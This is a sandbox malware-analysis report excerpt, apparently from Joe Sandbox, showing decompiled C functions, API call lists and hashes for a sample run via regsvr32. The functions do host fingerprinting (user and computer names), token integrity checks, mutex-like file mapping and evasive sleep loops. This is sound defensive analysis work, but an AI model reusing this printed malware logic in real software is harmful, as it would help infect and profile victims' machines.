                                      • Part of subcall function 001A7067: lstrcpy.KERNEL32(00000000,032F8AA2), ref: 001A7093
                                      • Part of subcall function 001A7067: lstrcat.KERNEL32(00000000,?), ref: 001A709E
                                    • lstrcpy.KERNEL32(00000000,?), ref: 001A731C
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 001A732A
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 001A732E
                                    • HeapFree.KERNEL32(00000000,?,00000000), ref: 001A735E
                                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001A736D
                                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001A737D
                                    • HeapFree.KERNEL32(00000000,?), ref: 001A738E
                                    • HeapFree.KERNEL32(00000000,00000000), ref: 001A739C
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: wsprintf$Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTickTrimlstrcpy$EnterLeavestrcpy
                                    • String ID:
                                    • API String ID: 1837416118-0
                                    • Opcode ID: d4823b05327776c0654943371480d410d4859e9bc136116261634d23e68e0bd6
                                    • Instruction ID: 00b73ca97aff2ca00c970c71801a7d51dab2dc961469cf90c4e21e957a586b45
                                    • Opcode Fuzzy Hash: d4823b05327776c0654943371480d410d4859e9bc136116261634d23e68e0bd6
                                    • Instruction Fuzzy Hash: 34719171504204AFC722DB68ED88E977BECFF8B340B150415F909C3661E73AE995DB62
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 83%
                                    			E001A6D30(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                    				struct %anon52 _v8;
                                    				long _v12;
                                    				char _v16;
                                    				char _v20;
                                    				signed int _v24;
                                    				intOrPtr _v32;
                                    				union _LARGE_INTEGER _v36;
                                    				intOrPtr _v40;
                                    				void* _v44;
                                    				void _v88;
                                    				char _v92;
                                    				struct %anon52 _t46;
                                    				intOrPtr _t51;
                                    				long _t53;
                                    				void* _t54;
                                    				struct %anon52 _t61;
                                    				long _t65;
                                    				signed int _t66;
                                    				void* _t69;
                                    				void* _t71;
                                    				signed int _t72;
                                    				intOrPtr _t74;
                                    				intOrPtr _t76;
                                    				void** _t78;
                                    				void* _t80;
                                    
                                    				_t74 = __edx;
                                    				_v92 = 0;
                                    				memset( &_v88, 0, 0x2c);
                                    				_t46 = CreateWaitableTimerA(0, 1, 0);
                                    				_v44 = _t46;
                                    				if(_t46 == 0) {
                                    					_v8.LowPart = GetLastError();
                                    				} else {
                                    					_push(0xffffffff);
                                    					_push(0xff676980);
                                    					_push(0);
                                    					_push( *0x1aa298);
                                    					_v20 = 0;
                                    					_v16 = 0;
                                    					L001A7DDC();
                                    					_v36.LowPart = _t46;
                                    					_v32 = _t74;
                                    					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                    					_t51 =  *0x1aa2c4; // 0x18c
                                    					_v40 = _t51;
                                    					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                    					_v8.LowPart = _t53;
                                    					if(_t53 == 0) {
                                    						if(_a8 != 0) {
                                    							L4:
                                    							 *0x1aa2a4 = 5;
                                    						} else {
                                    							_t69 = E001A14C4(_t74); // executed
                                    							if(_t69 != 0) {
                                    								goto L4;
                                    							}
                                    						}
                                    						_v12 = 0;
                                    						L6:
                                    						L6:
                                    						if(_v12 == 1 && ( *0x1aa2b8 & 0x00000001) == 0) {
                                    							_v12 = 2;
                                    						}
                                    						_t72 = _v12;
                                    						_t58 = _t72 << 4;
                                    						_t76 = _t80 + (_t72 << 4) - 0x54;
                                    						_t73 = _t72 + 1;
                                    						_v24 = _t72 + 1;
                                    						_t61 = E001A2FE6( &_v20, _t73, _t76, _t73, _t80 + _t58 - 0x58, _t76,  &_v16);
                                    						_v8.LowPart = _t61;
                                    						if(_t61 != 0) {
                                    							goto L17;
                                    						}
                                    						_t66 = _v24;
                                    						_t90 = _t66 - 3;
                                    						_v12 = _t66;
                                    						if(_t66 != 3) {
                                    							goto L6;
                                    						} else {
                                    							_v8.LowPart = E001A1723(_t73, _t90,  &_v92, _a4, _a8);
                                    						}
                                    						goto L12;
                                    						L17:
                                    						__eflags = _t61 - 0x10d2;
                                    						if(_t61 != 0x10d2) {
                                    							_push(0xffffffff);
                                    							_push(0xff676980);
                                    							_push(0);
                                    							_push( *0x1aa29c);
                                    							goto L21;
                                    						} else {
                                    							__eflags =  *0x1aa2a0; // 0x1
                                    							if(__eflags == 0) {
                                    								goto L12;
                                    							} else {
                                    								_t61 = E001A454A();
                                    								_push(0xffffffff);
                                    								_push(0xdc3cba00);
                                    								_push(0);
                                    								_push( *0x1aa2a0);
                                    								L21:
                                    								L001A7DDC();
                                    								_v36.LowPart = _t61;
                                    								_v32 = _t76;
                                    								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
                                    								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                    								__eflags = _t65;
                                    								_v8.LowPart = _t65;
                                    								if(_t65 == 0) {
                                    									goto L6;
                                    								} else {
                                    									goto L12;
                                    								}
                                    							}
                                    						}
                                    						L25:
                                    					}
                                    					L12:
                                    					_t78 =  &_v92;
                                    					_t71 = 3;
                                    					do {
                                    						_t54 =  *_t78;
                                    						if(_t54 != 0) {
                                    							HeapFree( *0x1aa290, 0, _t54);
                                    						}
                                    						_t78 =  &(_t78[4]);
                                    						_t71 = _t71 - 1;
                                    					} while (_t71 != 0);
                                    					CloseHandle(_v44);
                                    				}
                                    				return _v8;
                                    				goto L25;
                                    			}





























                                    APIs
                                    • memset.NTDLL ref: 001A6D45
                                    • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 001A6D51
                                    • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001A6D76
                                    • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001A6D92
                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001A6DAB
                                    • HeapFree.KERNEL32(00000000,00000000), ref: 001A6E40
                                    • CloseHandle.KERNEL32(?), ref: 001A6E4F
                                    • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 001A6E89
                                    • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,001A5FE7), ref: 001A6E9F
                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001A6EAA
                                      • Part of subcall function 001A14C4: StrToIntExW.SHLWAPI(?,00000000,?), ref: 001A1513
                                      • Part of subcall function 001A14C4: HeapFree.KERNEL32(00000000,00000000,?), ref: 001A15B0
                                      • Part of subcall function 001A14C4: HeapFree.KERNEL32(00000000,?), ref: 001A15C2
                                    • GetLastError.KERNEL32 ref: 001A6EBC
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                    • String ID:
                                    • API String ID: 3521023985-0
                                    • Opcode ID: 1f4679c2e906fe213c4895d329c99b4022108e84e5cc526f06a652b74cae6643
                                    • Instruction ID: d10f3a5b4dfacbe8973b8facf6ca4c5f615d3241f6c8490ef907a71b47ad40a8
                                    • Opcode Fuzzy Hash: 1f4679c2e906fe213c4895d329c99b4022108e84e5cc526f06a652b74cae6643
                                    • Instruction Fuzzy Hash: AB516BB9901228AECF11DFA4DD44DEEBFBDEF0A760F244116F514E2191D7718A84CBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    C-Code - Quality: 74%
                                    			E001A4E2A(intOrPtr __edx, void** _a4, void** _a8) {
                                    				intOrPtr _v8;
                                    				struct _FILETIME* _v12;
                                    				short _v56;
                                    				struct _FILETIME* _t12;
                                    				intOrPtr _t13;
                                    				void* _t17;
                                    				void* _t21;
                                    				intOrPtr _t27;
                                    				long _t28;
                                    				void* _t30;
                                    
                                    				_t27 = __edx;
                                    				_t12 =  &_v12;
                                    				GetSystemTimeAsFileTime(_t12);
                                    				_push(0x192);
                                    				_push(0x54d38000);
                                    				_push(_v8);
                                    				_push(_v12);
                                    				L001A7DD6();
                                    				_push(_t12);
                                    				_v12 = _t12;
                                    				_t13 =  *0x1aa2d4; // 0x314d7d0
                                    				_t5 = _t13 + 0x1ab84d; // 0x32f901d
                                    				_t6 = _t13 + 0x1ab580; // 0x530025
                                    				_push(0x16);
                                    				_push( &_v56);
                                    				_v8 = _t27;
                                    				L001A7ABA();
                                    				_t17 = CreateFileMappingW(0xffffffff, 0x1aa2f8, 4, 0, 0x1000,  &_v56); // executed
                                    				_t30 = _t17;
                                    				if(_t30 == 0) {
                                    					_t28 = GetLastError();
                                    				} else {
                                    					if(GetLastError() == 0xb7) {
                                    						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                    						if(_t21 == 0) {
                                    							_t28 = GetLastError();
                                    							if(_t28 != 0) {
                                    								goto L6;
                                    							}
                                    						} else {
                                    							 *_a4 = _t30;
                                    							 *_a8 = _t21;
                                    							_t28 = 0;
                                    						}
                                    					} else {
                                    						_t28 = 2;
                                    						L6:
                                    						CloseHandle(_t30);
                                    					}
                                    				}
                                    				return _t28;
                                    			}














                                    APIs
                                    • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,001A5E63,?,00000001,?), ref: 001A4E36
                                    • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 001A4E4C
                                    • _snwprintf.NTDLL ref: 001A4E71
                                    • CreateFileMappingW.KERNELBASE(000000FF,001AA2F8,00000004,00000000,00001000,?), ref: 001A4E8D
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,001A5E63,?), ref: 001A4E9F
                                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 001A4EB6
                                    • CloseHandle.KERNEL32(00000000), ref: 001A4ED7
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,001A5E63,?), ref: 001A4EDF
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                    • String ID:
                                    • API String ID: 1814172918-0
                                    • Opcode ID: 7b85ff00403dee3a1facf86dcc66cea8993845cca829e4d892ee7dcea0d50d69
                                    • Instruction ID: 411194bf76393128665d21870553ef3e2e52f051acd80e969fda0e0b672ab349
                                    • Opcode Fuzzy Hash: 7b85ff00403dee3a1facf86dcc66cea8993845cca829e4d892ee7dcea0d50d69
                                    • Instruction Fuzzy Hash: 6521D57A600204BBC721DB68DC05F9E77BDBF86790F254121F905E71D0D7B49944C760
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 218 1a5dcd-1a5de8 call 1a6296 221 1a5dea-1a5df8 218->221 222 1a5dfe-1a5e0c CoInitializeEx 218->222 221->222 223 1a5e1e-1a5e65 call 1a3822 ConvertStringSecurityDescriptorToSecurityDescriptorA call 1a4e2a 222->223 224 1a5e0e-1a5e11 222->224 232 1a5e70-1a5e73 223->232 233 1a5e67-1a5e6a CloseHandle 223->233 224->223 225 1a5e13-1a5e18 224->225 225->223 227 1a5ffd 225->227 230 1a5fff-1a6005 227->230 234 1a5e9c-1a5eac 232->234 235 1a5e75-1a5e7a 232->235 233->232 236 1a5eae-1a5eb3 call 1a2e33 234->236 237 1a5ef5-1a5f13 call 1a13ab call 1a77d7 234->237 238 1a5fe9-1a5fed 235->238 239 1a5e80 235->239 246 1a5eb8-1a5ec3 call 1a77d7 236->246 255 1a5f40-1a5f42 237->255 256 1a5f15-1a5f3e memset RtlInitializeCriticalSection 237->256 242 1a5fef-1a5ff3 238->242 243 1a5ff5-1a5ffb 238->243 240 1a5e83-1a5e95 call 1a1697 239->240 253 1a5e97 240->253 242->230 242->243 243->230 257 1a5eef 246->257 258 1a5ec5-1a5eec wsprintfA 246->258 253->238 259 1a5f43-1a5f45 255->259 256->259 257->237 258->257 259->238 260 1a5f4b-1a5f61 RtlAllocateHeap 259->260 261 1a5f8b-1a5f8d 260->261 262 1a5f63-1a5f89 wsprintfA 260->262 263 1a5f8e-1a5f90 261->263 262->263 263->238 264 1a5f92-1a5fb2 call 1a2e33 call 1a2654 263->264 264->238 269 1a5fb4-1a5fbb call 1a28c0 264->269 272 1a5fbd-1a5fc0 269->272 273 1a5fc2-1a5fc9 269->273 272->238 274 1a5fcb-1a5fcd 273->274 275 1a5fde-1a5fe2 call 1a6d30 273->275 274->238 276 1a5fcf-1a5fdc call 1a1d8c 274->276 279 1a5fe7 275->279 276->238 276->275 279->238
                                    C-Code - Quality: 64%
                                    			E001A5DCD(signed int __edx) {
                                    				signed int _v8;
                                    				long _v12;
                                    				signed int _v16;
                                    				long _v20;
                                    				void* _v24;
                                    				intOrPtr _v28;
                                    				intOrPtr _v32;
                                    				intOrPtr _v36;
                                    				char _v40;
                                    				void* __edi;
                                    				void* __esi;
                                    				void* _t27;
                                    				long _t28;
                                    				long _t31;
                                    				intOrPtr _t32;
                                    				void* _t36;
                                    				signed int _t37;
                                    				intOrPtr _t38;
                                    				void* _t39;
                                    				CHAR* _t42;
                                    				long _t48;
                                    				long _t49;
                                    				void* _t54;
                                    				void* _t56;
                                    				intOrPtr _t64;
                                    				void* _t67;
                                    				long _t71;
                                    				void* _t72;
                                    				signed char _t74;
                                    				intOrPtr _t76;
                                    				signed int _t77;
                                    				long _t82;
                                    				long _t84;
                                    				CHAR* _t87;
                                    				void* _t88;
                                    
                                    				_t79 = __edx;
                                    				_v16 = 0;
                                    				_v8 = 0;
                                    				_v12 = 0;
                                    				_t27 = E001A6296();
                                    				if(_t27 != 0) {
                                    					_t77 =  *0x1aa2b4; // 0x10000106
                                    					_t73 = (_t77 & 0xf0000000) + _t27;
                                    					 *0x1aa2b4 = (_t77 & 0xf0000000) + _t27;
                                    				}
                                    				_t28 =  *0x1aa148(0, 2);
                                    				_v20 = _t28;
                                    				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
                                    					_t31 = E001A3822( &_v8,  &_v16); // executed
                                    					_push(0);
                                    					_t84 = _t31;
                                    					_t32 =  *0x1aa2d4; // 0x314d7d0
                                    					_push(0x1aa2fc);
                                    					_push(1);
                                    					_t7 = _t32 + 0x1ab5bc; // 0x4d283a53
                                    					 *0x1aa2f8 = 0xc;
                                    					 *0x1aa300 = 0;
                                    					L001A1D3B();
                                    					_t36 = E001A4E2A(_t79,  &_v24,  &_v12); // executed
                                    					if(_t36 == 0) {
                                    						CloseHandle(_v24);
                                    					}
                                    					if(_t84 != 5) {
                                    						_t37 = _v16;
                                    						__eflags = _t37;
                                    						if(_t37 != 0) {
                                    							E001A2E33(_t37 ^ 0xe8fa7dd7,  &_v40); // executed
                                    							_t87 = E001A77D7(0x27);
                                    							__eflags = _t87;
                                    							if(_t87 != 0) {
                                    								asm("bswap eax");
                                    								asm("bswap eax");
                                    								asm("bswap eax");
                                    								asm("bswap eax");
                                    								_t64 =  *0x1aa2d4; // 0x314d7d0
                                    								_t18 = _t64 + 0x1ab86f; // 0x78383025
                                    								wsprintfA(_t87, _t18, _v40, _v36, _v32, _v28);
                                    								_t88 = _t88 + 0x18;
                                    							}
                                    							 *0x1aa32c = _t87;
                                    						}
                                    						_t38 = E001A13AB();
                                    						 *0x1aa2c8 =  *0x1aa2c8 ^ 0xe8fa7dd7;
                                    						 *0x1aa31c = _t38;
                                    						_t39 = E001A77D7(0x60);
                                    						__eflags = _t39;
                                    						 *0x1aa37c = _t39;
                                    						if(_t39 == 0) {
                                    							_t84 = 8;
                                    						} else {
                                    							memset(_t39, 0, 0x60);
                                    							_t54 =  *0x1aa37c; // 0x32f9858
                                    							_t88 = _t88 + 0xc;
                                    							__imp__(_t54 + 0x40);
                                    							_t56 =  *0x1aa37c; // 0x32f9858
                                    							 *_t56 = 0x1ab85e;
                                    							_t84 = 0;
                                    						}
                                    						__eflags = _t84;
                                    						if(_t84 == 0) {
                                    							_t42 = RtlAllocateHeap( *0x1aa290, _t84, 0x52);
                                    							__eflags = _t42;
                                    							 *0x1aa314 = _t42;
                                    							if(_t42 == 0) {
                                    								_t84 = 8;
                                    							} else {
                                    								_t74 =  *0x1aa2b4; // 0x10000106
                                    								_t79 = _t74 & 0x000000ff;
                                    								_t76 =  *0x1aa2d4; // 0x314d7d0
                                    								_t19 = _t76 + 0x1ab212; // 0x697a6f4d
                                    								_t73 = _t19;
                                    								wsprintfA(_t42, _t19, _t74 & 0x000000ff, _t74 & 0x000000ff, 0x1a92a7);
                                    							}
                                    							__eflags = _t84;
                                    							if(_t84 == 0) {
                                    								asm("sbb eax, eax");
                                    								E001A2E33( ~_v8 &  *0x1aa2c8, 0x1aa00c); // executed
                                    								_t84 = E001A2654(_t73);
                                    								__eflags = _t84;
                                    								if(_t84 != 0) {
                                    									goto L31;
                                    								}
                                    								_t48 = E001A28C0();
                                    								__eflags = _t48;
                                    								if(_t48 != 0) {
                                    									__eflags = _v8;
                                    									_t82 = _v12;
                                    									if(_v8 != 0) {
                                    										L30:
                                    										_t49 = E001A6D30(_t79, _t82, _v8); // executed
                                    										_t84 = _t49;
                                    										goto L31;
                                    									}
                                    									__eflags = _t82;
                                    									if(__eflags == 0) {
                                    										goto L31;
                                    									}
                                    									_t23 = _t82 + 4; // 0x5
                                    									_t84 = E001A1D8C(__eflags, _t23);
                                    									__eflags = _t84;
                                    									if(_t84 == 0) {
                                    										goto L31;
                                    									}
                                    									goto L30;
                                    								}
                                    								_t84 = 8;
                                    							}
                                    						}
                                    					} else {
                                    						_t71 = _v12;
                                    						if(_t71 == 0) {
                                    							L31:
                                    							if(_v20 == 0 || _v20 == 1) {
                                    								 *0x1aa14c();
                                    							}
                                    							goto L35;
                                    						}
                                    						_t72 = _t71 + 4;
                                    						do {
                                    							_push(1);
                                    							_push(_t72);
                                    							_t67 = 5;
                                    						} while (E001A1697(_t67, 0) == 0x4c7);
                                    					}
                                    					goto L31;
                                    				} else {
                                    					_t84 = _t28;
                                    					L35:
                                    					return _t84;
                                    				}
                                    			}






































                                    0x001a5ffd
                                    0x001a6000
                                    0x001a6005
                                    0x001a6005

                                    APIs
                                      • Part of subcall function 001A6296: GetModuleHandleA.KERNEL32(4C44544E,00000000,001A5DE6,00000000,00000000,00000000,?,?,?,?,?,001A66FE,?,00000001), ref: 001A62A5
                                    • CoInitializeEx.OLE32(00000000,00000002), ref: 001A5E01
                                    • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,001AA2FC,00000000), ref: 001A5E51
                                    • CloseHandle.KERNEL32(?), ref: 001A5E6A
                                    • wsprintfA.USER32 ref: 001A5EEA
                                    • memset.NTDLL ref: 001A5F1A
                                    • RtlInitializeCriticalSection.NTDLL(032F9818), ref: 001A5F2B
                                    • RtlAllocateHeap.NTDLL(00000008,00000052,00000060), ref: 001A5F54
                                    • wsprintfA.USER32 ref: 001A5F84
                                      • Part of subcall function 001A2E33: GetUserNameW.ADVAPI32(00000000,001A5FA9), ref: 001A2E6A
                                      • Part of subcall function 001A2E33: RtlAllocateHeap.NTDLL(00000000,001A5FA9), ref: 001A2E81
                                      • Part of subcall function 001A2E33: GetUserNameW.ADVAPI32(00000000,001A5FA9), ref: 001A2E8E
                                      • Part of subcall function 001A2E33: HeapFree.KERNEL32(00000000,00000000), ref: 001A2EAF
                                      • Part of subcall function 001A2E33: GetComputerNameW.KERNEL32(00000000,00000000), ref: 001A2ED6
                                      • Part of subcall function 001A2E33: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001A2EEA
                                      • Part of subcall function 001A2E33: GetComputerNameW.KERNEL32(00000000,00000000), ref: 001A2EF7
                                      • Part of subcall function 001A2E33: HeapFree.KERNEL32(00000000,00000000), ref: 001A2F15
                                      • Part of subcall function 001A77D7: RtlAllocateHeap.NTDLL(00000000,00000000,001A1275), ref: 001A77E3
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Heap$AllocateName$ComputerDescriptorFreeHandleInitializeSecurityUserwsprintf$CloseConvertCriticalModuleSectionStringmemset
                                    • String ID:
                                    • API String ID: 2719557597-0
                                    • Opcode ID: 2686a30a7570b552830a3f560fb0cdcaa689d5eaee511b7355d2116e3032a71d
                                    • Instruction ID: da43e320275301f63285084c4e37f363d5b340355f0ebacd8ee256f74d394ec6
                                    • Opcode Fuzzy Hash: 2686a30a7570b552830a3f560fb0cdcaa689d5eaee511b7355d2116e3032a71d
                                    • Instruction Fuzzy Hash: 135122BA904614AFDB21DBA8DD85FAEB7BAAF17700F500012F804E7651D774DE80CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 314 1a39e8-1a3a03 315 1a3a09-1a3a22 OpenProcessToken 314->315 316 1a3aa2-1a3aae 314->316 317 1a3aa1 315->317 318 1a3a24-1a3a4f GetTokenInformation * 2 315->318 317->316 319 1a3a51-1a3a5e call 1a77d7 318->319 320 1a3a97-1a3aa0 CloseHandle 318->320 323 1a3a60-1a3a71 GetTokenInformation 319->323 324 1a3a96 319->324 320->317 325 1a3a73-1a3a8d GetSidSubAuthorityCount GetSidSubAuthority 323->325 326 1a3a90-1a3a91 call 1a77ec 323->326 324->320 325->326 326->324
                                    C-Code - Quality: 100%
                                    			E001A39E8(long* _a4) {
                                    				long _v8;
                                    				void* _v12;
                                    				void _v16;
                                    				long _v20;
                                    				int _t33;
                                    				void* _t46;
                                    
                                    				_v16 = 1;
                                    				_v20 = 0x2000;
                                    				if( *0x1aa2b4 > 5) {
                                    					_v16 = 0;
                                    					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                    						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                    						_v8 = 0;
                                    						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                    						if(_v8 != 0) {
                                    							_t46 = E001A77D7(_v8);
                                    							if(_t46 != 0) {
                                    								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                    								if(_t33 != 0) {
                                    									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                    								}
                                    								E001A77EC(_t46);
                                    							}
                                    						}
                                    						CloseHandle(_v12);
                                    					}
                                    				}
                                    				 *_a4 = _v20;
                                    				return _v16;
                                    			}










                                    APIs
                                    • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 001A3A1A
                                    • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,00000000,00000000), ref: 001A3A3A
                                    • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 001A3A4A
                                    • CloseHandle.KERNEL32(00000000), ref: 001A3A9A
                                      • Part of subcall function 001A77D7: RtlAllocateHeap.NTDLL(00000000,00000000,001A1275), ref: 001A77E3
                                    • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?), ref: 001A3A6D
                                    • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 001A3A75
                                    • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 001A3A85
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                    • String ID:
                                    • API String ID: 1295030180-0
                                    • Opcode ID: 14003991119e177b5c40bafe8358061cdcb821dde779c1b1b1b83c504a2b6fb2
                                    • Instruction ID: 518263705d6de4d77d492a1db1542c3725e2310c935a0c5a3f8256bebf898341
                                    • Opcode Fuzzy Hash: 14003991119e177b5c40bafe8358061cdcb821dde779c1b1b1b83c504a2b6fb2
                                    • Instruction Fuzzy Hash: 0D212A79900219FFEB11DF94DD84EAEBBB9EF05304F0040A5F611A61A1D7715F54EB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 328 1a6632-1a6654 HeapCreate 329 1a665e-1a6673 GetTickCount call 1a6707 328->329 330 1a6656-1a6659 328->330 331 1a66fe-1a6704 329->331 334 1a6679-1a66c6 GetSystemTimeAsFileTime SwitchToThread _aullrem call 1a1228 Sleep 329->334 330->331 337 1a66c8-1a66d3 334->337 338 1a66f9 call 1a5dcd 337->338 339 1a66d5-1a66e3 IsWow64Process 337->339 338->331 341 1a66e9-1a66ed 339->341 342 1a66e5 339->342 341->338 343 1a66ef 341->343 342->341 343->338
                                    C-Code - Quality: 73%
                                    			E001A6632(signed int __edx, intOrPtr _a4) {
                                    				struct _FILETIME _v12;
                                    				char _v32;
                                    				long _v40;
                                    				void* _t14;
                                    				void* _t16;
                                    				int _t18;
                                    				signed int _t20;
                                    				void* _t22;
                                    				signed int _t23;
                                    				intOrPtr _t25;
                                    				unsigned int _t29;
                                    				signed int _t34;
                                    				signed int _t41;
                                    
                                    				_t34 = __edx;
                                    				_t14 = HeapCreate(0, 0x400000, 0); // executed
                                    				 *0x1aa290 = _t14;
                                    				if(_t14 != 0) {
                                    					 *0x1aa180 = GetTickCount();
                                    					_t16 = E001A6707(_a4);
                                    					if(_t16 != 0) {
                                    						L10:
                                    						return _t16;
                                    					} else {
                                    						goto L3;
                                    					}
                                    					do {
                                    						L3:
                                    						GetSystemTimeAsFileTime( &_v12);
                                    						_t18 = SwitchToThread();
                                    						_t29 = _v12.dwHighDateTime;
                                    						_t20 = (_t29 << 0x00000020 | _v12.dwLowDateTime) >> 5;
                                    						_push(0);
                                    						_push(0x13);
                                    						_push(_t29 >> 5);
                                    						_push(_t20);
                                    						L001A7F3A();
                                    						_t41 = _t18 + _t20;
                                    						_t22 = E001A1228(_a4, _t41);
                                    						_t23 = 3;
                                    						Sleep(_t23 << (_t41 & 0x00000007));
                                    					} while (_t22 == 1);
                                    					_t25 =  *0x1aa2ac; // 0x190
                                    					_v32 = 0;
                                    					if(_t25 != 0) {
                                    						__imp__(_t25,  &_v32); // executed
                                    						if(_t25 == 0) {
                                    							_v40 = 0;
                                    						}
                                    						if(_v40 != 0) {
                                    							 *0x1aa2b8 = 1; // executed
                                    						}
                                    					}
                                    					_t16 = E001A5DCD(_t34); // executed
                                    					goto L10;
                                    				}
                                    				_t16 = 8;
                                    				goto L10;
                                    			}

















                                    APIs
                                    • HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001), ref: 001A6647
                                    • GetTickCount.KERNEL32(?,00000001), ref: 001A665E
                                    • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001), ref: 001A667E
                                    • SwitchToThread.KERNEL32(?,00000001), ref: 001A6684
                                    • _aullrem.NTDLL(?,?,00000013,00000000), ref: 001A66A0
